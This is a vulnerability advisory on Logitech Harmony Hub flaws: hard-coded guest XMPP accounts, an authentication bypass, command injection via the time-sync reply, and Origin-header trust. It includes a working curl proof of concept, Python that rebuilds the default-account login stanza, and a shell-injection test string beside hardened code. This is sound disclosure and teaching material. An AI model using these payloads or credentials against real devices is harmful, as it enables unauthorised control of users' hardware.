### Synopsis

Tenable found multiple vulnerabilities in Logitech's Harmony Hub.

#### CVE-2018-15720: XMPP Default Accounts

The XMPP server contains two undocumented default accounts. The accounts have the same privileges as any normal authenticated user. The two accepted strings are base64-encoded SASL PLAIN messages: they decode to the NUL-separated byte strings `\0guest\0guest` and `guest\0guest\0`, i.e. credentials built entirely from the word `guest`.

```
File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua
Function: processAuthenticate = function(self, str)
-- function num : 0_12 , upvalues : AUTH_GUEST, AUTH_YES, AUTH_NO
if str == "AGd1ZXN0AGd1ZXN0" or str == "Z3Vlc3QAZ3Vlc3QA" then
  self.clientJid = "guest"
  self.authenticated = AUTH_GUEST
```

#### CVE-2018-15721: XMPP Authentication Bypass

A crafted XMPP request can be used to bypass authentication. When an XMPP request doesn't contain an *oa* element to initialize the identity variable, it remains uninitialized. In that state `authenticate` returns whatever username is passed to it; because any non-empty string is truthy in Lua, `processAuthenticate` then marks the connection as fully authenticated (`AUTH_YES`) without any credential check.

```
File: luaworks/tasks/connectserver/core/xmppconnection.lua.out.lua
Function: processAuthenticate = function(self, str)
...
if self:authenticate(str) then
  self.clientJid = "1111"
  self.authenticated = AUTH_YES
...
authenticate = function(self, userName)
-- function num : 0_11
if not self.identity then
  return userName
...
processHlapiRequest = function(self, cmd, parameters)
...
if (response.data).identity then
  self.identity = (response.data).identity
```

#### CVE-2018-15722: Remote Server OS Command Injection

On boot, the device makes a time synchronization request to a remote server. The server's response is eventually passed to an operating system shell command via the Lua `os.execute` function in **timemanager.lua**. Because the response is not validated, a remote attacker who controls that response is able to inject OS commands.

#### CVE-2018-15723: Crafted HTTP Request Application Command Injection

A crafted HTTP request allows a remote unauthenticated attacker to execute application-level commands (e.g. *harmony.system?systeminfo*). HTTP POST requests to port 8088 that carry a forged HTTP `Origin` header are implicitly trusted by the device.
A proof of concept follows:

```
curl -d "{\"cmd\":\"harmony.system?systeminfo\"}" -H "Origin: .myharmony.com" -H "Content-Type: application/json" "http://192.168.0.176:8088"
{"msg":"OK","data":{"unit_id":"20170121214639-000143","fw_type":"0x00","fw_ver":"4.15.193","arch":"0x11","hw_ver":"0x00","usb_product_id":"0xC129","skin":"106","usb_vendor_id":"0x046D"},"code":"200"}
```
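Returning to CVE-2018-15720: the two hard-coded strings in `processAuthenticate` are ordinary SASL PLAIN messages (RFC 4616), so the default credentials can be recovered and re-encoded with a few lines of standard-library code. The following is an added example written for this page, not Tenable's or Logitech's code; only the two base64 constants come from the advisory. The `<auth>` stanza format in `build_auth_stanza()` is the RFC 6120 SASL exchange and is an assumption about what the hub's XMPP server expects.

```python
"""Decode and rebuild the SASL PLAIN blobs behind the Harmony Hub default accounts.

Added example (not Tenable's or Logitech's code). The two base64 constants are
taken from the advisory; the <auth> stanza format is assumed (RFC 6120 SASL).
"""
import base64
from typing import NamedTuple

# Exactly the two strings compared in processAuthenticate (from the advisory).
DEFAULT_ACCOUNT_BLOBS = ("AGd1ZXN0AGd1ZXN0", "Z3Vlc3QAZ3Vlc3QA")


class PlainCredentials(NamedTuple):
    authzid: str   # authorization identity, may be empty
    authcid: str   # authentication identity, i.e. the username
    password: str


def decode_sasl_plain(blob: str) -> PlainCredentials:
    """Split a base64 SASL PLAIN message into its three NUL-separated fields."""
    raw = base64.b64decode(blob, validate=True)
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        raise ValueError(f"expected 3 NUL-separated fields, got {len(parts)}")
    return PlainCredentials(*(p.decode("utf-8") for p in parts))


def encode_sasl_plain(authcid: str, password: str, authzid: str = "") -> str:
    """Inverse of decode_sasl_plain: authzid NUL authcid NUL password, base64'd."""
    raw = b"\x00".join(s.encode("utf-8") for s in (authzid, authcid, password))
    return base64.b64encode(raw).decode("ascii")


def is_default_account(blob: str) -> bool:
    """Mirror of the firmware's comparison: does this blob hit an undocumented account?"""
    return blob in DEFAULT_ACCOUNT_BLOBS


def build_auth_stanza(blob: str) -> str:
    """SASL <auth> stanza carrying the PLAIN blob (assumed to match the hub's XMPP server)."""
    return (
        '<auth xmlns="urn:ietf:params:xml:ns:xmpp-sasl" mechanism="PLAIN">'
        f"{blob}</auth>"
    )


if __name__ == "__main__":
    for blob in DEFAULT_ACCOUNT_BLOBS:
        creds = decode_sasl_plain(blob)
        print(f"{blob} -> authzid={creds.authzid!r} user={creds.authcid!r} "
              f"password={creds.password!r}")
        print(build_auth_stanza(blob))
```

Note that the second constant decodes with `guest` as the authorization identity and an empty password; both forms are accepted by the firmware's string comparison, so either reproduces the undocumented login.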
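For CVE-2018-15722 the advisory publishes neither the time server's reply format nor the exact `os.execute` call in **timemanager.lua**, so the example below is an added illustration of the bug class rather than the firmware's code: a network reply interpolated into a shell string, beside the hardened version that validates the reply against a strict pattern and runs the command as an argv list with no shell. The `YYYY-MM-DD HH:MM:SS` format, the `date -s` command and the sample replies are constructed assumptions.

```python
"""Command injection through an unvalidated time-sync reply, modelled in Python.

Added example; not Harmony Hub firmware and not Tenable's code. The reply
format ("YYYY-MM-DD HH:MM:SS"), the `date -s` command and the sample inputs
are assumptions standing in for whatever timemanager.lua actually uses.
"""
import re
from datetime import datetime

# The only shape we are willing to accept from the network: digits and separators.
_TIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")


def vulnerable_command(server_reply: str) -> str:
    """The os.execute pattern: splice the reply straight into a shell string.

    Returned rather than executed so the quote-break is visible without side effects.
    """
    return f"date -s '{server_reply}'"


def parse_time_reply(server_reply: str) -> datetime:
    """Hardened parse: reject anything that is not exactly one timestamp."""
    if not _TIME_RE.match(server_reply):
        raise ValueError(f"malformed time reply: {server_reply!r}")
    # strptime additionally rejects digit strings that are not real calendar times.
    return datetime.strptime(server_reply, "%Y-%m-%d %H:%M:%S")


def validate_time_reply(server_reply: str) -> bool:
    """True if the reply would be accepted by the hardened path."""
    try:
        parse_time_reply(server_reply)
    except ValueError:
        return False
    return True


def safe_command(server_reply: str) -> list:
    """Hardened command: argv list (no shell), built only from the validated value."""
    ts = parse_time_reply(server_reply)
    return ["date", "-s", ts.strftime("%Y-%m-%d %H:%M:%S")]


if __name__ == "__main__":
    # Constructed inputs: a benign reply and one that breaks out of the single quotes.
    benign = "2018-12-01 10:20:30"
    hostile = "2018-12-01 10:20:30'; touch /tmp/pwned; echo '"
    print(vulnerable_command(hostile))            # two extra shell commands ride along
    print(safe_command(benign))                   # ['date', '-s', '2018-12-01 10:20:30']
    print(validate_time_reply(hostile))           # False
```

Running `safe_command()`'s argv through `subprocess.run(argv)` (no `shell=True`) would then set the clock without ever handing the reply to `/bin/sh`; the allowlist regex is what makes the argv construction safe even if a shell were involved.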
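The proof of concept for CVE-2018-15723 is accepted with the bare value `.myharmony.com` in the `Origin` header, which points at a loose string match on the device. The advisory does not show that check, so the example below is an added one written for this page, not the hub's code: `loose_origin_ok()` is a stand-in for the kind of suffix test the PoC value defeats, and `strict_origin_ok()` is the check an origin allowlist should actually perform. The allowlist contents are an assumption.

```python
"""Origin-header checks for a JSON API such as the Harmony Hub's port 8088 service.

Added example; not the Harmony Hub's code. loose_origin_ok() models the kind of
suffix match that the advisory's `Origin: .myharmony.com` PoC suggests; the
allowlist in ALLOWED_ORIGINS is an assumption.
"""
from urllib.parse import urlsplit

# (scheme, host, port) tuples; None means the scheme's default port.
ALLOWED_ORIGINS = {("https", "www.myharmony.com", None)}
DEFAULT_PORTS = {"http": 80, "https": 443}


def loose_origin_ok(origin: str) -> bool:
    """Stand-in for a naive suffix test; the bare value '.myharmony.com' passes it."""
    return origin.endswith(".myharmony.com")


def strict_origin_ok(origin: str) -> bool:
    """Parse the Origin as a serialized origin (scheme://host[:port]) and compare exactly."""
    if origin == "null":
        return False  # opaque origin: never trust it
    try:
        parts = urlsplit(origin)
        port = parts.port  # ValueError on garbage like ':abc' or an invalid IPv6 literal
    except ValueError:
        return False
    if parts.path or parts.query or parts.fragment or parts.username:
        return False  # a real Origin header carries no path, query, fragment or userinfo
    scheme = parts.scheme.lower()
    host = parts.hostname
    if not scheme or not host:
        return False
    if port == DEFAULT_PORTS.get(scheme):
        port = None  # normalise "https://x:443" to "https://x"
    return (scheme, host.lower(), port) in ALLOWED_ORIGINS


if __name__ == "__main__":
    # Constructed test values, including the advisory's PoC header.
    for candidate in (".myharmony.com",
                      "https://evil.example/.myharmony.com",
                      "https://www.myharmony.com.evil.example",
                      "https://www.myharmony.com"):
        print(f"{candidate!r:45} loose={loose_origin_ok(candidate)!s:5} "
              f"strict={strict_origin_ok(candidate)}")
```

The last line of that output is the important caveat: `strict_origin_ok("https://www.myharmony.com")` is `True`, and a non-browser client such as the `curl` command above can send exactly that header. A well-formed `Origin` check only defends against cross-site requests launched from a browser; it is not authentication, and an endpoint that executes commands like `harmony.system?systeminfo` still needs a real credential check behind it.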